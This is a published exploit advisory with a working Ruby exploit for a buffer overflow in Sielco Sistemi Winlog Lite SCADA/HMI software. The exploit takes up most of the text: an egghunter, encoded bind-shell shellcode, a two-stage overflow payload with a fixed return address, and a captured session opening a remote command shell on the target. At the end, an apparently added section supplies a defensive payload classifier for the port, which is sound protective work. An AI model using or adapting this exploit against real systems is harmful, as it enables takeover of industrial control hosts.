# Title : Sielco Sistemi Winlog <= 2.07.16 Buffer Overflow
# Published : 2012-06-05


#!/usr/bin/ruby

# Exploit Title: Sielco Sistemi Winlog Buffer Overflow <= v2.07.16
# Date: 05.06.2012
# Exploit Author: m1k3
# Vendor Homepage: http://www.sielcosistemi.com/en/download/public/winlog_lite.html
# Software Link: http://www.sielcosistemi.com/en/download/public/winlog_lite.html
# Version: 2.07.14
# Tested on: Windows XP SP2

#---------------------------------------------
#
# Sielco Sistemi Winlog Buffer Overflow <= v2.07.16
# - Buffer overflow vulnerability
# Date: 05.06.2012
#
# ---------------------------------------------
#
# - Description
# Winlog Lite is the entry level version of the SCADA/HMI software Winlog Pro offered by Sielco Sistemi to allow an evaluation of the potentiality and the simplicity of use of the package; Winlog Lite is also a powerful and low cost solution for creation of small supervisory applications.
# Winlog Lite makes available most of development tools and functions provided by the Winlog Pro software package, but limits the possibility to develop and to run applications up to a max of 24 tags. Winlog Lite does not include Symbol Factory library and web support.
# Source: http://www.sielcosistemi.com/en/download/public/winlog_lite.html
#
# - buffer overflow vulnerability
#
# The vulnerability can be triggered by sending a specially crafted request to port 46824. 
#
# - Solution
#
# No known solution available. Filter access to port 46824.
#
# - Credits
#
# The vulnerability was discovered by m1k3 (@s3cur1ty_de)
#  - devnull#at#s3cur1ty#dot#de
#  - http://www.s3cur1ty.de
#
# Thx to @corelanc0d3r and @offsectraining for their great work :)
#
# - Timeline
#
# 04.06.2012 - Vulnerability discovered
# 05.06.2012 - Public disclosure
#
# - Reference
#
# Download vulnerable software: http://www.sielcosistemi.com/en/download/public/winlog_lite.html
# Offensive Security Training: http://www.offensive-security.com/
# Corelan Training: https://www.corelan-training.com/

# - Exploit:

#root@bt:~/msf-scripts# ruby runtime-exploit-01.rb
#placing the shellcode
#sleeping ...
#kicking ...
#buffer length: 261
#root@bt:~/msf-scripts# netcat -v 10.8.28.37 4444
#10.8.28.37: inverse host lookup failed: Unknown server error : Connection timed out
#(UNKNOWN) [10.8.28.37] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\All Users\Application Data\Winlog Lite\Projects\Ceramics Kiln\Template>
#
# Important:
# -> the reliability of your exploit depends on that path ...
# if you choose another default project or you start another project, this path is not reliable anymore.
# You can choose the default project on the installation. I have used Ceramics Kiln.

require 'socket'

port = "46824"
host = "10.8.28.37"

s = TCPSocket.open(host,port)

sleep(0.5)

# 32-byte egghunter searching for the 8-byte tag "wootwoot" (escape sequences restored)
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter << "\xef\xb8\x77\x6f\x6f\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

# msfpayload windows/shell_bind_tcp R | msfencode -t ruby
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode =
"\xdb\xc8\xd9\x74\x24\xf4\x5b\xba\x45\x76\x08\xf1\x33\xc9" +
"\xb1\x56\x31\x53\x18\x83\xeb\xfc\x03\x53\x51\x94\xfd\x0d" +
"\xb1\xd1\xfe\xed\x41\x82\x77\x08\x70\x90\xec\x58\x20\x24" +
"\x66\x0c\xc8\xcf\x2a\xa5\x5b\xbd\xe2\xca\xec\x08\xd5\xe5" +
"\xed\xbc\xd9\xaa\x2d\xde\xa5\xb0\x61\x00\x97\x7a\x74\x41" +
"\xd0\x67\x76\x13\x89\xec\x24\x84\xbe\xb1\xf4\xa5\x10\xbe" +
"\x44\xde\x15\x01\x30\x54\x17\x52\xe8\xe3\x5f\x4a\x83\xac" +
"\x7f\x6b\x40\xaf\xbc\x22\xed\x04\x36\xb5\x27\x55\xb7\x87" +
"\x07\x3a\x86\x27\x8a\x42\xce\x80\x74\x31\x24\xf3\x09\x42" +
"\xff\x89\xd5\xc7\xe2\x2a\x9e\x70\xc7\xcb\x73\xe6\x8c\xc0" +
"\x38\x6c\xca\xc4\xbf\xa1\x60\xf0\x34\x44\xa7\x70\x0e\x63" +
"\x63\xd8\xd5\x0a\x32\x84\xb8\x33\x24\x60\x65\x96\x2e\x83" +
"\x72\xa0\x6c\xcc\xb7\x9f\x8e\x0c\xdf\xa8\xfd\x3e\x40\x03" +
"\x6a\x73\x09\x8d\x6d\x74\x20\x69\xe1\x8b\xca\x8a\x2b\x48" +
"\x9e\xda\x43\x79\x9e\xb0\x93\x86\x4b\x16\xc4\x28\x23\xd7" +
"\xb4\x88\x93\xbf\xde\x06\xcc\xa0\xe0\xcc\x7b\xe7\x2e\x34" +
"\x28\x80\x52\xca\xdf\x0c\xda\x2c\xb5\xbc\x8a\xe7\x21\x7f" +
"\xe9\x3f\xd6\x80\xdb\x13\x4f\x17\x53\x7a\x57\x18\x64\xa8" +
"\xf4\xb5\xcc\x3b\x8e\xd5\xc8\x5a\x91\xf3\x78\x14\xaa\x94" +
"\xf3\x48\x79\x04\x03\x41\xe9\xa5\x96\x0e\xe9\xa0\x8a\x98" +
"\xbe\xe5\x7d\xd1\x2a\x18\x27\x4b\x48\xe1\xb1\xb4\xc8\x3e" +
"\x02\x3a\xd1\xb3\x3e\x18\xc1\x0d\xbe\x24\xb5\xc1\xe9\xf2" +
"\x63\xa4\x43\xb5\xdd\x7e\x3f\x1f\x89\x07\x73\xa0\xcf\x07" +
"\x5e\x56\x2f\xb9\x37\x2f\x50\x76\xd0\xa7\x29\x6a\x40\x47" +
"\xe0\x2e\x70\x02\xa8\x07\x19\xcb\x39\x1a\x44\xec\x94\x59" +
"\x71\x6f\x1c\x22\x86\x6f\x55\x27\xc2\x37\x86\x55\x5b\xd2" +
"\xa8\xca\x5c\xf7"

puts "placing the shellcode"
# stage 1: place the egg-tagged shellcode in process memory
buffer = "\x41" * 2000
buffer << "wootwoot" #egg
buffer << "\x90"
buffer << shellcode
buffer << "\x90" * 2000
print "buffer length: #{buffer.length}\r\n"
s.puts(buffer)

puts "sleeping ..."
sleep(5)

puts "kicking ..."
# stage 2: overflow the buffer, overwrite EIP and land in the egghunter (261 bytes)
buffer = "\x41" * 20 + "\x14" * 10 + "\x41" * 167
buffer << "\xdf\x53\x51\x40" #EIP -> Jmp ESP - Vclx40.bpl - 0x405153df
buffer << "\x90"
buffer << egghunter
buffer << "\x90" * (59 - egghunter.length)
print "buffer length: #{buffer.length}\r\n"
s.puts(buffer)
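The advisory's only stated mitigation is to filter access to port 46824. As an added defensive example (this is not part of the original advisory or m1k3's script), the Ruby snippet below classifies TCP payloads aimed at that port, flagging ones that are far longer than a sane request or that consist mostly of one repeated byte, which is the padding shape of both stages above. The port constant comes from the advisory; the length and run thresholds, the function names and the sample payloads are assumptions constructed for illustration.

```ruby
# Added example, not part of the original advisory or exploit script.
# Flags requests to the Winlog port (46824) that are oversized or that are
# mostly one repeated byte. Thresholds are assumptions, not vendor figures.

WINLOG_PORT   = 46824
MAX_SANE_LEN  = 128  # assumed: legitimate Winlog requests are expected to be short
RUN_THRESHOLD = 64   # assumed: a run of one byte this long looks like padding

# Length of the longest run of a single repeated byte in +data+.
def longest_byte_run(data)
  best = 0
  cur  = 0
  prev = nil
  data.each_byte do |b|
    if b == prev
      cur += 1
    else
      cur  = 1
      prev = b
    end
    best = cur if cur > best
  end
  best
end

# Classify one TCP payload. Returns a hash with :verdict (:ignored for
# other ports, :allow, or :alert) and the list of :reasons behind an alert.
def classify_payload(dst_port, data)
  return { verdict: :ignored, reasons: [] } unless dst_port == WINLOG_PORT

  reasons = []
  reasons << "payload length #{data.bytesize} exceeds #{MAX_SANE_LEN}" if data.bytesize > MAX_SANE_LEN
  run = longest_byte_run(data)
  reasons << "run of #{run} identical bytes (padding/NOP sled)" if run >= RUN_THRESHOLD

  { verdict: reasons.empty? ? :allow : :alert, reasons: reasons }
end

# Constructed samples (not captured traffic): a short request, an oversized
# padded request of the kind the script above sends, and the same bytes on
# another port, which the classifier leaves alone.
SAMPLES = [
  [WINLOG_PORT, "\x01\x00\x05hello".b],
  [WINLOG_PORT, ("\x41" * 2000 + "\x90" * 64).b],
  [80,          ("\x41" * 2000).b],
]

if __FILE__ == $0
  SAMPLES.each do |port, payload|
    result = classify_payload(port, payload)
    puts "port #{port}, #{payload.bytesize} bytes -> #{result[:verdict]} #{result[:reasons].join('; ')}"
  end
end
```

The repeated-byte check catches the padding regardless of which byte is used, so it does not depend on the 0x41 or 0x90 values in this particular script; the length check is the blunter of the two and is what a port-level filter would approximate.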